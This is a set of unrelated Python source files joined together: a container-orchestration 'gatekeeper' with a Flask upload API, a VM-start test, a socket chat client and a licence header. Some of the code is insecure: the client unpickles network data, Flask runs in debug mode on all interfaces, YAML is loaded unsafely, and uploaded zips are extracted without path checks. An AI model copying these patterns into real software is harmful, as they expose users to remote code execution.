intfs.remove(found_interfaces[0])
mgmt_intf_names.append(vnf_interface)
# 4. generate the volume paths for the docker container
volumes = list()
# a volume to extract log files
docker_log_path = "/tmp/results/%s/%s" % (self.uuid, vnf_id)
LOG.debug("LOG path for vnf %s is %s." % (vnf_id, docker_log_path))
if not os.path.exists(docker_log_path):
LOG.debug("Creating folder %s" % docker_log_path)
os.makedirs(docker_log_path)
volumes.append(docker_log_path + ":/mnt/share/")
# 5. do the dc.startCompute(name="foobar") call to run the container
# TODO consider flavors, and other annotations
# TODO: get all vnf id's from the nsd for this vnfd and use those as dockername
# use the vnf_id in the nsd as docker name
# so deployed containers can be easily mapped back to the nsd
LOG.info("Starting %r as %r in DC %r" %
(vnf_name, vnf_id, vnfd.get("dc")))
LOG.debug("Interfaces for %r: %r" % (vnf_id, intfs))
vnfi = target_dc.startCompute(
vnf_id,
network=intfs,
image=docker_name,
flavor_name="small",
cpu_quota=cpu_quota,
cpu_period=cpu_period,
cpuset=cpu_list,
mem_limit=mem_lim,
volumes=volumes,
type=kwargs.get('type', 'docker'))
# rename the docker0 interfaces (eth0) to the management port name
# defined in the VNFD
if USE_DOCKER_MGMT:
for intf_name in mgmt_intf_names:
self._vnf_reconfigure_network(
vnfi, 'eth0', new_name=intf_name)
return vnfi
def _stop_vnfi(self, vnfi):
"""
Stop a VNF instance.
:param vnfi: vnf instance to be stopped
"""
# Find the correct datacenter
status = vnfi.getStatus()
dc = vnfi.datacenter
# stop the vnfi
LOG.info("Stopping the vnf instance contained in %r in DC %r" %
(status["name"], dc))
dc.stopCompute(status["name"])
def _get_vnf_instance(self, instance_uuid, vnf_id):
"""
Returns the Docker object for the given VNF id (or Docker name).
:param instance_uuid: UUID of the service instance to search in.
:param vnf_id: VNF name or Docker name. We are fuzzy here.
:return:
"""
dn = vnf_id
for vnfi in self.instances[instance_uuid]["vnf_instances"]:
if vnfi.name == dn:
return vnfi
LOG.warning("No container with name: {0} found.".format(dn))
return None
@staticmethod
def _vnf_reconfigure_network(vnfi, if_name, net_str=None, new_name=None):
"""
Reconfigure the network configuration of a specific interface
of a running container.
:param vnfi: container instance
:param if_name: interface name
:param net_str: network configuration string, e.g., 1.2.3.4/24
:return:
"""
# assign new ip address
if net_str is not None:
intf = vnfi.intf(intf=if_name)
if intf is not None:
intf.setIP(net_str)
LOG.debug("Reconfigured network of %s:%s to %r" %
(vnfi.name, if_name, net_str))
else:
LOG.warning("Interface not found: %s:%s. Network reconfiguration skipped." % (
vnfi.name, if_name))
if new_name is not None:
vnfi.cmd('ip link set', if_name, 'down')
vnfi.cmd('ip link set', if_name, 'name', new_name)
vnfi.cmd('ip link set', new_name, 'up')
LOG.debug("Reconfigured interface name of %s:%s to %s" %
(vnfi.name, if_name, new_name))
def _trigger_emulator_start_scripts_in_vnfis(self, vnfi_list):
for vnfi in vnfi_list:
config = vnfi.dcinfo.get("Config", dict())
env = config.get("Env", list())
for env_var in env:
var, cmd = map(str.strip, map(str, env_var.split('=', 1)))
LOG.debug("%r = %r" % (var, cmd))
if var == "SON_EMU_CMD":
LOG.info("Executing entry point script in %r: %r" %
(vnfi.name, cmd))
# execute command in new thread to ensure that GK is not
# blocked by VNF
t = threading.Thread(target=vnfi.cmdPrint, args=(cmd,))
t.daemon = True
t.start()
def _trigger_emulator_stop_scripts_in_vnfis(self, vnfi_list):
for vnfi in vnfi_list:
config = vnfi.dcinfo.get("Config", dict())
env = config.get("Env", list())
for env_var in env:
var, cmd = map(str.strip, map(str, env_var.split('=', 1)))
if var == "SON_EMU_CMD_STOP":
LOG.info("Executing stop script in %r: %r" %
(vnfi.name, cmd))
# execute command in new thread to ensure that GK is not
# blocked by VNF
t = threading.Thread(target=vnfi.cmdPrint, args=(cmd,))
t.daemon = True
t.start()
def _unpack_service_package(self):
"""
unzip *.son file and store contents in CATALOG_FOLDER/services/<service_uuid>/
"""
LOG.info("Unzipping: %r" % self.package_file_path)
with zipfile.ZipFile(self.package_file_path, "r") as z:
z.extractall(self.package_content_path)
def _load_package_descriptor(self):
"""
Load the main package descriptor YAML and keep it as dict.
:return:
"""
self.manifest = load_yaml(
os.path.join(
self.package_content_path, "META-INF/MANIFEST.MF"))
def _load_nsd(self):
"""
Load the entry NSD YAML and keep it as dict.
:return:
"""
if "entry_service_template" in self.manifest:
nsd_path = os.path.join(
self.package_content_path,
make_relative_path(self.manifest.get("entry_service_template")))
self.nsd = load_yaml(nsd_path)
GK.net.deployed_nsds.append(self.nsd)
# create dict to find the vnf_name for any vnf id
self.vnf_id2vnf_name = defaultdict(lambda: "NotExistingNode",
reduce(lambda x, y: dict(x, **y),
map(lambda d: {d["vnf_id"]: d["vnf_name"]},
self.nsd["network_functions"])))
LOG.debug("Loaded NSD: %r" % self.nsd.get("name"))
def _load_vnfd(self):
"""
Load all VNFD YAML files referenced in MANIFEST.MF and keep them in dict.
:return:
"""
# first make a list of all the vnfds in the package
vnfd_set = dict()
if "package_content" in self.manifest:
for pc in self.manifest.get("package_content"):
if pc.get(
"content-type") == "application/sonata.function_descriptor":
vnfd_path = os.path.join(
self.package_content_path,
make_relative_path(pc.get("name")))
vnfd = load_yaml(vnfd_path)
vnfd_set[vnfd.get("name")] = vnfd
# then link each vnf_id in the nsd to its vnfd
for vnf_id in self.vnf_id2vnf_name:
vnf_name = self.vnf_id2vnf_name[vnf_id]
self.vnfds[vnf_id] = vnfd_set[vnf_name]
LOG.debug("Loaded VNFD: {0} id: {1}".format(vnf_name, vnf_id))
def _load_saps(self):
# create list of all SAPs
# check if we need to deploy management ports
if USE_DOCKER_MGMT:
SAPs = [p for p in self.nsd["connection_points"]
if 'management' not in p.get('type')]
else:
SAPs = [p for p in self.nsd["connection_points"]]
for sap in SAPs:
# endpoint needed in this service
sap_id, sap_interface, sap_docker_name = parse_interface(sap['id'])
# make sure SAP has type set (default internal)
sap["type"] = sap.get("type", 'internal')
# Each Service Access Point (connection_point) in the nsd is an IP
# address on the host
if sap["type"] == "external":
# add to vnfds to calculate placement later on
sap_net = SAP_SUBNETS.pop(0)
self.saps[sap_docker_name] = {
"name": sap_docker_name, "type": "external", "net": sap_net}
# add SAP vnf to list in the NSD so it is deployed later on
# each SAP gets a unique VNFD and vnf_id in the NSD and custom
# type (only defined in the dummygatekeeper)
self.nsd["network_functions"].append(
{"vnf_id": sap_docker_name, "vnf_name": sap_docker_name, "vnf_type": "sap_ext"})
# Each Service Access Point (connection_point) in the nsd is
# getting its own container (default)
elif sap["type"] == "internal" or sap["type"] == "management":
# add SAP to self.vnfds
if SAP_VNFD is None:
sapfile = pkg_resources.resource_filename(
__name__, "sap_vnfd.yml")
else:
sapfile = SAP_VNFD
sap_vnfd = load_yaml(sapfile)
sap_vnfd["connection_points"][0]["id"] = sap_interface
sap_vnfd["name"] = sap_docker_name
sap_vnfd["type"] = "internal"
# add to vnfds to calculate placement later on and deploy
self.saps[sap_docker_name] = sap_vnfd
# add SAP vnf to list in the NSD so it is deployed later on
# each SAP get a unique VNFD and vnf_id in the NSD
self.nsd["network_functions"].append(
{"vnf_id": sap_docker_name, "vnf_name": sap_docker_name, "vnf_type": "sap_int"})
LOG.debug("Loaded SAP: name: {0}, type: {1}".format(
sap_docker_name, sap['type']))
# create sap lists
self.saps_ext = [self.saps[sap]['name']
for sap in self.saps if self.saps[sap]["type"] == "external"]
self.saps_int = [self.saps[sap]['name']
for sap in self.saps if self.saps[sap]["type"] == "internal"]
def _start_sap(self, sap, instance_uuid):
if not DEPLOY_SAP:
return
LOG.info('start SAP: {0}, type: {1}'.format(sap['name'], sap['type']))
if sap["type"] == "internal":
vnfi = None
if not GK_STANDALONE_MODE:
vnfi = self._start_vnfd(sap, sap['name'], type='sap_int')
self.instances[instance_uuid]["vnf_instances"].append(vnfi)
elif sap["type"] == "external":
target_dc = sap.get("dc")
# add interface to dc switch
target_dc.attachExternalSAP(sap['name'], sap['net'])
def _connect_elines(self, eline_fwd_links, instance_uuid):
"""
Connect all E-LINE links in the NSD
:param eline_fwd_links: list of E-LINE links in the NSD
:param: instance_uuid of the service
:return:
"""
# cookie is used as identifier for the flowrules installed by the dummygatekeeper
# eg. different services get a unique cookie for their flowrules
cookie = 1
for link in eline_fwd_links:
# check if we need to deploy this link when it is a management link:
if USE_DOCKER_MGMT:
if self.check_mgmt_interface(
link["connection_points_reference"]):
continue
src_id, src_if_name, src_sap_id = parse_interface(
link["connection_points_reference"][0])
dst_id, dst_if_name, dst_sap_id = parse_interface(
link["connection_points_reference"][1])
setChaining = False
# check if there is a SAP in the link and chain everything together
if src_sap_id in self.saps and dst_sap_id in self.saps:
LOG.info(
'2 SAPs cannot be chained together : {0} - {1}'.format(src_sap_id, dst_sap_id))
continue
elif src_sap_id in self.saps_ext:
src_id = src_sap_id
# set intf name to None so the chaining function will choose
# the first one
src_if_name = None
dst_vnfi = self._get_vnf_instance(instance_uuid, dst_id)
if dst_vnfi is not None:
# choose first ip address in sap subnet
sap_net = self.saps[src_sap_id]['net']
sap_ip = "{0}/{1}".format(str(sap_net[2]),
sap_net.prefixlen)
self._vnf_reconfigure_network(
dst_vnfi, dst_if_name, sap_ip)
setChaining = True
elif dst_sap_id in self.saps_ext:
dst_id = dst_sap_id
# set intf name to None so the chaining function will choose
# the first one
dst_if_name = None
src_vnfi = self._get_vnf_instance(instance_uuid, src_id)
if src_vnfi is not None:
sap_net = self.saps[dst_sap_id]['net']
sap_ip = "{0}/{1}".format(str(sap_net[2]),
sap_net.prefixlen)
self._vnf_reconfigure_network(
src_vnfi, src_if_name, sap_ip)
setChaining = True
# Link between 2 VNFs
else:
# make sure we use the correct sap vnf name
if src_sap_id in self.saps_int:
src_id = src_sap_id
if dst_sap_id in self.saps_int:
dst_id = dst_sap_id
# re-configure the VNFs IP assignment and ensure that a new
# subnet is used for each E-Link
src_vnfi = self._get_vnf_instance(instance_uuid, src_id)
dst_vnfi = self._get_vnf_instance(instance_uuid, dst_id)
if src_vnfi is not None and dst_vnfi is not None:
eline_net = ELINE_SUBNETS.pop(0)
ip1 = "{0}/{1}".format(str(eline_net[1]),
eline_net.prefixlen)
ip2 = "{0}/{1}".format(str(eline_net[2]),
eline_net.prefixlen)
self._vnf_reconfigure_network(src_vnfi, src_if_name, ip1)
self._vnf_reconfigure_network(dst_vnfi, dst_if_name, ip2)
setChaining = True
# Set the chaining
if setChaining:
GK.net.setChain(
src_id, dst_id,
vnf_src_interface=src_if_name, vnf_dst_interface=dst_if_name,
bidirectional=BIDIRECTIONAL_CHAIN, cmd="add-flow", cookie=cookie, priority=10)
LOG.debug(
"Setting up E-Line link. (%s:%s) -> (%s:%s)" % (
src_id, src_if_name, dst_id, dst_if_name))
def _connect_elans(self, elan_fwd_links, instance_uuid):
"""
Connect all E-LAN links in the NSD
:param elan_fwd_links: list of E-LAN links in the NSD
:param: instance_uuid of the service
:return:
"""
for link in elan_fwd_links:
# check if we need to deploy this link when it is a management link:
if USE_DOCKER_MGMT:
if self.check_mgmt_interface(
link["connection_points_reference"]):
continue
elan_vnf_list = []
# check if an external SAP is in the E-LAN (then a subnet is
# already defined)
intfs_elan = [intf for intf in link["connection_points_reference"]]
lan_sap = self.check_ext_saps(intfs_elan)
if lan_sap:
lan_net = self.saps[lan_sap]['net']
lan_hosts = list(lan_net.hosts())
else:
lan_net = ELAN_SUBNETS.pop(0)
lan_hosts = list(lan_net.hosts())
# generate lan ip address for all interfaces except external SAPs
for intf in link["connection_points_reference"]:
# skip external SAPs, they already have an ip
vnf_id, vnf_interface, vnf_sap_docker_name = parse_interface(
intf)
if vnf_sap_docker_name in self.saps_ext:
elan_vnf_list.append(
{'name': vnf_sap_docker_name, 'interface': vnf_interface})
continue
ip_address = "{0}/{1}".format(str(lan_hosts.pop(0)),
lan_net.prefixlen)
vnf_id, intf_name, vnf_sap_id = parse_interface(intf)
# make sure we use the correct sap vnf name
src_docker_name = vnf_id
if vnf_sap_id in self.saps_int:
src_docker_name = vnf_sap_id
vnf_id = vnf_sap_id
LOG.debug(
"Setting up E-LAN interface. (%s:%s) -> %s" % (
vnf_id, intf_name, ip_address))
# re-configure the VNFs IP assignment and ensure that a new subnet is used for each E-LAN
# E-LAN relies on the learning switch capability of Ryu which has to be turned on in the topology
# (DCNetwork(controller=RemoteController, enable_learning=True)), so no explicit chaining is necessary.
vnfi = self._get_vnf_instance(instance_uuid, vnf_id)
if vnfi is not None:
self._vnf_reconfigure_network(vnfi, intf_name, ip_address)
# add this vnf and interface to the E-LAN for tagging
elan_vnf_list.append(
{'name': src_docker_name, 'interface': intf_name})
# install the VLAN tags for this E-LAN
GK.net.setLAN(elan_vnf_list)
def _load_docker_files(self):
"""
Get all paths to Dockerfiles from VNFDs and store them in dict.
:return:
"""
for k, v in self.vnfds.iteritems():
for vu in v.get("virtual_deployment_units"):
if vu.get("vm_image_format") == "docker":
vm_image = vu.get("vm_image")
docker_path = os.path.join(
self.package_content_path,
make_relative_path(vm_image))
self.local_docker_files[k] = docker_path
LOG.debug("Found Dockerfile (%r): %r" % (k, docker_path))
def _load_docker_urls(self):
"""
        Get all URLs to pre-built Docker images in some repository.
:return:
"""
# also merge sap dicts, because internal saps also need a docker
# container
all_vnfs = self.vnfds.copy()
all_vnfs.update(self.saps)
for k, v in all_vnfs.iteritems():
for vu in v.get("virtual_deployment_units", {}):
if vu.get("vm_image_format") == "docker":
url = vu.get("vm_image")
if url is not None:
url = url.replace("http://", "")
self.remote_docker_image_urls[k] = url
LOG.debug("Found Docker image URL (%r): %r" %
(k, self.remote_docker_image_urls[k]))
def _build_images_from_dockerfiles(self):
"""
Build Docker images for each local Dockerfile found in the package: self.local_docker_files
"""
if GK_STANDALONE_MODE:
return # do not build anything in standalone mode
dc = DockerClient()
LOG.info("Building %d Docker images (this may take several minutes) ..." % len(
self.local_docker_files))
for k, v in self.local_docker_files.iteritems():
for line in dc.build(path=v.replace(
"Dockerfile", ""), tag=k, rm=False, nocache=False):
LOG.debug("DOCKER BUILD: %s" % line)
LOG.info("Docker image created: %s" % k)
def _pull_predefined_dockerimages(self):
"""
        If the package contains URLs to pre-built Docker images, we download them with this method.
"""
dc = DockerClient()
for url in self.remote_docker_image_urls.itervalues():
# only pull if not present (speedup for development)
if not FORCE_PULL:
if len(dc.images.list(name=url)) > 0:
LOG.debug("Image %r present. Skipping pull." % url)
continue
LOG.info("Pulling image: %r" % url)
# this seems to fail with latest docker api version 2.0.2
# dc.images.pull(url,
# insecure_registry=True)
# using docker cli instead
cmd = ["docker",
"pull",
url,
]
Popen(cmd).wait()
def _check_docker_image_exists(self, image_name):
"""
Query the docker service and check if the given image exists
:param image_name: name of the docker image
:return:
"""
return len(DockerClient().images.list(name=image_name)) > 0
def _calculate_placement(self, algorithm):
"""
        Do placement by adding a field "dc" to
        each VNFD that points to one of the
        data center objects known to the gatekeeper.
"""
assert(len(self.vnfds) > 0)
assert(len(GK.dcs) > 0)
        # instantiate the algorithm and do the placement
p = algorithm()
p.place(self.nsd, self.vnfds, self.saps, GK.dcs)
LOG.info("Using placement algorithm: %r" % p.__class__.__name__)
# lets print the placement result
for name, vnfd in self.vnfds.iteritems():
LOG.info("Placed VNF %r on DC %r" % (name, str(vnfd.get("dc"))))
for sap in self.saps:
sap_dict = self.saps[sap]
LOG.info("Placed SAP %r on DC %r" % (sap, str(sap_dict.get("dc"))))
def _calculate_cpu_cfs_values(self, cpu_time_percentage):
"""
Calculate cpu period and quota for CFS
:param cpu_time_percentage: percentage of overall CPU to be used
:return: cpu_period, cpu_quota
"""
if cpu_time_percentage is None:
return -1, -1
if cpu_time_percentage < 0:
return -1, -1
# (see: https://www.kernel.org/doc/Documentation/scheduler/sched-bwc.txt)
        # Attention: the minimum cpu_quota accepted by the kernel is 1000 microseconds (1 ms)
        cpu_period = 1000000  # use a fixed period of 1000000 microseconds for now
LOG.debug("cpu_period is %r, cpu_percentage is %r" %
(cpu_period, cpu_time_percentage))
# calculate the fraction of cpu time for this container
cpu_quota = cpu_period * cpu_time_percentage
        # ATTENTION: keep cpu_quota >= 1000, otherwise the kernel rejects the
        # value with an "invalid argument" error (see sched-bwc.txt above)
if cpu_quota < 1000:
LOG.debug("cpu_quota before correcting: %r" % cpu_quota)
cpu_quota = 1000
LOG.warning("Increased CPU quota to avoid system error.")
LOG.debug("Calculated: cpu_period=%f / cpu_quota=%f" %
(cpu_period, cpu_quota))
return int(cpu_period), int(cpu_quota)
def check_ext_saps(self, intf_list):
        # check if the list of interfaces contains an external SAP
saps_ext = [self.saps[sap]['name']
for sap in self.saps if self.saps[sap]["type"] == "external"]
for intf_name in intf_list:
vnf_id, vnf_interface, vnf_sap_docker_name = parse_interface(
intf_name)
if vnf_sap_docker_name in saps_ext:
return vnf_sap_docker_name
def check_mgmt_interface(self, intf_list):
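        # return True if any interface in intf_list is a management connection point of the NSD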
SAPs_mgmt = [p.get('id') for p in self.nsd["connection_points"]
if 'management' in p.get('type')]
for intf_name in intf_list:
if intf_name in SAPs_mgmt:
return True
"""
Some (simple) placement algorithms
"""
class FirstDcPlacement(object):
"""
    Placement: place every VNF on one and the same data center (the first in the GK.dcs dict).
"""
def place(self, nsd, vnfds, saps, dcs):
for id, vnfd in vnfds.iteritems():
vnfd["dc"] = list(dcs.itervalues())[0]
class RoundRobinDcPlacement(object):
"""
Placement: Distribute VNFs across all available DCs in a round robin fashion.
"""
def place(self, nsd, vnfds, saps, dcs):
c = 0
dcs_list = list(dcs.itervalues())
for id, vnfd in vnfds.iteritems():
vnfd["dc"] = dcs_list[c % len(dcs_list)]
c += 1 # inc. c to use next DC
class RoundRobinDcPlacementWithSAPs(object):
"""
    Placement: distribute VNFs across all available DCs in a round-robin fashion;
    every SAP is placed on the same DC as the VNF it connects to.
"""
def place(self, nsd, vnfds, saps, dcs):
# place vnfs
c = 0
dcs_list = list(dcs.itervalues())
for id, vnfd in vnfds.iteritems():
vnfd["dc"] = dcs_list[c % len(dcs_list)]
c += 1 # inc. c to use next DC
# place SAPs
vlinks = nsd.get("virtual_links", [])
eline_fwd_links = [l for l in vlinks if (
l["connectivity_type"] == "E-Line")]
elan_fwd_links = [l for l in vlinks if (
l["connectivity_type"] == "E-LAN")]
# SAPs on E-Line links are placed on the same DC as the VNF on the
# E-Line
for link in eline_fwd_links:
src_id, src_if_name, src_sap_id = parse_interface(
link["connection_points_reference"][0])
dst_id, dst_if_name, dst_sap_id = parse_interface(
link["connection_points_reference"][1])
# check if there is a SAP in the link
if src_sap_id in saps:
# get dc where connected vnf is mapped to
dc = vnfds[dst_id]['dc']
saps[src_sap_id]['dc'] = dc
if dst_sap_id in saps:
# get dc where connected vnf is mapped to
dc = vnfds[src_id]['dc']
saps[dst_sap_id]['dc'] = dc
# SAPs on E-LANs are placed on a random DC
dcs_list = list(dcs.itervalues())
dc_len = len(dcs_list)
for link in elan_fwd_links:
for intf in link["connection_points_reference"]:
# find SAP interfaces
intf_id, intf_name, intf_sap_id = parse_interface(intf)
if intf_sap_id in saps:
dc = dcs_list[randint(0, dc_len - 1)]
saps[intf_sap_id]['dc'] = dc
"""
Resource definitions and API endpoints
"""
class Packages(fr.Resource):
def post(self):
"""
Upload a *.son service package to the dummy gatekeeper.
        We expect a request with a *.son file and store it in UPLOAD_FOLDER
:return: UUID
"""
try:
# get file contents
LOG.info("POST /packages called")
# lets search for the package in the request
is_file_object = False # make API more robust: file can be in data or in files field
if "package" in request.files:
son_file = request.files["package"]
is_file_object = True
elif len(request.data) > 0:
son_file = request.data
else:
return {"service_uuid": None, "size": 0, "sha1": None,
"error": "upload failed. file not found."}, 500
# generate a uuid to reference this package
service_uuid = str(uuid.uuid4())
file_hash = hashlib.sha1(str(son_file)).hexdigest()
# ensure that upload folder exists
ensure_dir(UPLOAD_FOLDER)
upload_path = os.path.join(UPLOAD_FOLDER, "%s.son" % service_uuid)
# store *.son file to disk
if is_file_object:
son_file.save(upload_path)
else:
with open(upload_path, 'wb') as f:
f.write(son_file)
size = os.path.getsize(upload_path)
# first stop and delete any other running services
if AUTO_DELETE:
service_list = copy.copy(GK.services)
                # use a separate loop variable so the freshly generated
                # service_uuid of the uploaded package is not overwritten
                for old_service_uuid in service_list:
                    instances_list = copy.copy(
                        GK.services[old_service_uuid].instances)
                    for instance_uuid in instances_list:
                        # valid service and instance UUID, stop service
                        GK.services.get(old_service_uuid).stop_service(
                            instance_uuid)
                        LOG.info("service instance with uuid %r stopped." %
                                 instance_uuid)
# create a service object and register it
s = Service(service_uuid, file_hash, upload_path)
GK.register_service_package(service_uuid, s)
# automatically deploy the service
if AUTO_DEPLOY:
# ok, we have a service uuid, lets start the service
reset_subnets()
GK.services.get(service_uuid).start_service()
# generate the JSON result
return {"service_uuid": service_uuid, "size": size,
"sha1": file_hash, "error": None}, 201
except BaseException:
LOG.exception("Service package upload failed:")
return {"service_uuid": None, "size": 0,
"sha1": None, "error": "upload failed"}, 500
def get(self):
"""
Return a list of UUID's of uploaded service packages.
:return: dict/list
"""
LOG.info("GET /packages")
return {"service_uuid_list": list(GK.services.iterkeys())}
class Instantiations(fr.Resource):
def post(self):
"""
Instantiate a service specified by its UUID.
Will return a new UUID to identify the running service instance.
:return: UUID
"""
LOG.info("POST /instantiations (or /requests) called")
# try to extract the service uuid from the request
json_data = request.get_json(force=True)
service_uuid = json_data.get("service_uuid")
# lets be a bit fuzzy here to make testing easier
if (service_uuid is None or service_uuid ==
"latest") and len(GK.services) > 0:
            # if we don't get a service uuid, we simply start the first service
# in the list
service_uuid = list(GK.services.iterkeys())[0]
if service_uuid in GK.services:
# ok, we have a service uuid, lets start the service
service_instance_uuid = GK.services.get(
service_uuid).start_service()
return {"service_instance_uuid": service_instance_uuid}, 201
return "Service not found", 404
def get(self):
"""
Returns a list of UUIDs containing all running services.
:return: dict / list
"""
LOG.info("GET /instantiations")
return {"service_instantiations_list": [
list(s.instances.iterkeys()) for s in GK.services.itervalues()]}
def delete(self):
"""
Stops a running service specified by its service and instance UUID.
"""
# try to extract the service and instance UUID from the request
json_data = request.get_json(force=True)
service_uuid = json_data.get("service_uuid")
instance_uuid = json_data.get("service_instance_uuid")
# try to be fuzzy
if service_uuid is None and len(GK.services) > 0:
            # if we don't get a service uuid, we simply stop the first service
            # in the list
service_uuid = list(GK.services.iterkeys())[0]
if instance_uuid is None and len(
GK.services[service_uuid].instances) > 0:
instance_uuid = list(
GK.services[service_uuid].instances.iterkeys())[0]
if service_uuid in GK.services and instance_uuid in GK.services[service_uuid].instances:
# valid service and instance UUID, stop service
GK.services.get(service_uuid).stop_service(instance_uuid)
return "service instance with uuid %r stopped." % instance_uuid, 200
return "Service not found", 404
class Exit(fr.Resource):
def put(self):
"""
Stop the running Containernet instance regardless of data transmitted
"""
list(GK.dcs.values())[0].net.stop()
def initialize_GK():
global GK
GK = Gatekeeper()
# create a single, global GK object
GK = None
initialize_GK()
# setup Flask
app = Flask(__name__)
app.config['MAX_CONTENT_LENGTH'] = 512 * 1024 * 1024 # 512 MB max upload
api = fr.Api(app)
# define endpoints
api.add_resource(Packages, '/packages', '/api/v2/packages')
api.add_resource(Instantiations, '/instantiations',
'/api/v2/instantiations', '/api/v2/requests')
api.add_resource(Exit, '/emulator/exit')
def start_rest_api(host, port, datacenters=dict()):
GK.dcs = datacenters
GK.net = get_dc_network()
# start the Flask server (not the best performance but ok for our use case)
app.run(host=host,
port=port,
debug=True,
use_reloader=False # this is needed to run Flask in a non-main thread
)
def ensure_dir(name):
if not os.path.exists(name):
os.makedirs(name)
def load_yaml(path):
with open(path, "r") as f:
try:
r = yaml.load(f)
except yaml.YAMLError as exc:
LOG.exception("YAML parse error: %r" % str(exc))
r = dict()
return r
def make_relative_path(path):
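    # e.g. "file://docker/Dockerfile" -> "docker/Dockerfile"
    #      "/docker/Dockerfile"       -> "docker/Dockerfile"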
if path.startswith("file://"):
path = path.replace("file://", "", 1)
if path.startswith("/"):
path = path.replace("/", "", 1)
return path
def get_dc_network():
"""
    Retrieve the DCNetwork this dummy gatekeeper (GK) is connected to.
    Assumes at least one data center is connected to this GK and that all data centers belong to the same DCNetwork.
:return:
"""
assert (len(GK.dcs) > 0)
return GK.dcs.values()[0].net
def parse_interface(interface_name):
"""
    Convert an interface name from the NSD into the corresponding vnf_id and vnf_interface names.
:param interface_name:
:return:
"""
if ':' in interface_name:
vnf_id, vnf_interface = interface_name.split(':')
vnf_sap_docker_name = interface_name.replace(':', '_')
else:
vnf_id = interface_name
vnf_interface = interface_name
vnf_sap_docker_name = interface_name
return vnf_id, vnf_interface, vnf_sap_docker_name
def reset_subnets():
# private subnet definitions for the generated interfaces
    # 10.10.xxx.0/30
global SAP_SUBNETS
SAP_SUBNETS = generate_subnets('10.10', 0, subnet_size=50, mask=30)
    # 10.20.xxx.0/24
global ELAN_SUBNETS
ELAN_SUBNETS = generate_subnets('10.20', 0, subnet_size=50, mask=24)
# 10.30.xxx.0/30
global ELINE_SUBNETS
ELINE_SUBNETS = generate_subnets('10.30', 0, subnet_size=50, mask=30)
if __name__ == '__main__':
"""
    Allow running the API in standalone mode.
"""
GK_STANDALONE_MODE = True
logging.getLogger("werkzeug").setLevel(logging.INFO)
start_rest_api("0.0.0.0", 8000)
|
test_start_vms_simultaneously.py
|
'''
Stop 4 VMs, then start them simultaneously.
@author: Youyk
'''
import zstackwoodpecker.operations.resource_operations as res_ops
import zstackwoodpecker.operations.config_operations as con_ops
import zstackwoodpecker.operations.vm_operations as vm_ops
import zstackwoodpecker.operations.net_operations as net_ops
import zstackwoodpecker.operations.account_operations as acc_ops
import zstackwoodpecker.test_util as test_util
import zstackwoodpecker.test_lib as test_lib
import zstackwoodpecker.test_state as test_state
import threading
import time
import apibinding.inventory as inventory
import sys
import os
session_uuid = None
test_stub = test_lib.lib_get_test_stub()
test_obj_dict = test_state.TestStateDict()
def test():
global session_uuid
session_uuid = acc_ops.login_as_admin()
l3_name = os.environ.get('l3VlanDNATNetworkName')
vm1 = test_stub.create_vlan_vm(l3_name=l3_name)
test_obj_dict.add_vm(vm1)
vm2 = test_stub.create_vlan_vm(l3_name=l3_name)
test_obj_dict.add_vm(vm2)
vm3 = test_stub.create_vlan_vm(l3_name=l3_name)
test_obj_dict.add_vm(vm3)
vm4 = test_stub.create_vlan_vm(l3_name=l3_name)
test_obj_dict.add_vm(vm4)
vms = [vm1, vm2, vm3, vm4]
for vm in vms:
thread = threading.Thread(target=vm_ops.stop_vm, args=(vm.get_vm().uuid, None, session_uuid,))
thread.start()
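    # wait until all stop threads have finished (only the main thread remains)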
while threading.activeCount() > 1:
time.sleep(0.1)
for vm in vms:
thread = threading.Thread(target=vm_ops.start_vm, args=(vm.get_vm().uuid, session_uuid,))
thread.start()
vm1.check()
vm2.check()
vm3.check()
vm4.check()
time.sleep(1)
acc_ops.logout(session_uuid)
while threading.activeCount() > 1:
time.sleep(0.1)
test_lib.lib_robot_cleanup(test_obj_dict)
    test_util.test_pass('Test start VMs simultaneously success')
def error_cleanup():
global session_uuid
acc_ops.logout(session_uuid)
test_lib.lib_error_cleanup(test_obj_dict)
|
client.py
|
import pickle
import time
import socket
import threading
import tkinter
import sys
import os
def cls():
os.system('cls' if os.name=='nt' else 'clear')
class Message:
def __init__(self,author,content,date):
self.author = author
self.content = content
self.date = date
class User:
    def __init__(self,uuid,username,password):
        self.uuid = uuid
        self.username = username
        self.password = password
class Chat:
def receivemessages(self):
while True:
# Waits for incoming messages
incomingmessage = cs.recv(4048)
# Loads new message into memory
newmessage = pickle.loads(incomingmessage)
# Adds message to local message list (this is redundant for now)
localmessages.append(newmessage)
# Prints out message author and content
cls()
for message in localmessages:
sys.stdout.write(message.author + ": " + message.content + "\n")
def sendmessages(self):
while True:
messagecontent = input()
            # use the username entered at login ("name" was never defined)
            outgoing = Message(attempt_username,messagecontent,time.time())
picklepayload = pickle.dumps(outgoing)
cs.send(picklepayload)
ip = input("Enter server IP: ")
port = 5556
errors = {
"loginfail" : "Login failed!",
"nametaken" : "That username has been taken."
}
# Loop for attempting connection to server
while True:
if ip == "":
ip = socket.gethostname()
request_new_account = input("New account? (y/n): ")
if request_new_account == "y":
new_account = True
else:
new_account = False
attempt_username = input("Enter your username: ")
attempt_password = input("Enter your password: ")
try:
cs = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
cs.connect((ip, port))
    except OSError:
        print("Could not connect to server!")
        # retry from the top of the loop instead of sending on an unconnected socket
        continue
cs.send(pickle.dumps((new_account,attempt_username,attempt_password)))
# Waits for server to either give a login error or not
response = pickle.loads(cs.recv(1024))
# Checks the error
if response == "loginfail" or response == "nametaken":
# Prints a friendly error description to user
print(errors[response])
        # Starts the connection attempt from the beginning if an error is sent
continue
# Announces connection
print("Connected to " + ip)
# Waits for message history list
picklepayload = cs.recv(1024)
# Loads chat message history into memory
localmessages = pickle.loads(picklepayload)
break
print("SUP!")
chat = Chat()
# Prints out the messages in the message history
#for message in localmessages:
#sys.stdout.write(message.author + ": " + message.content + "\n")
sendthread = threading.Thread(target = chat.sendmessages)
receivethread = threading.Thread(target = chat.receivemessages)
receivethread.start()
sendthread.start()
|
_server_test.py
|
# -*- coding: utf-8 -*-
#
# Copyright (c) 2008 (c) Benoit Chesneau <benoitc@e-engura.com>
#
# Permission to use, copy, modify, and distribute this software for any
# purpose with or without fee is hereby granted, provided that the above
# copyright notice and this permission notice appear in all copies.
#
# THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES
# WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF
# MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR
# ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES
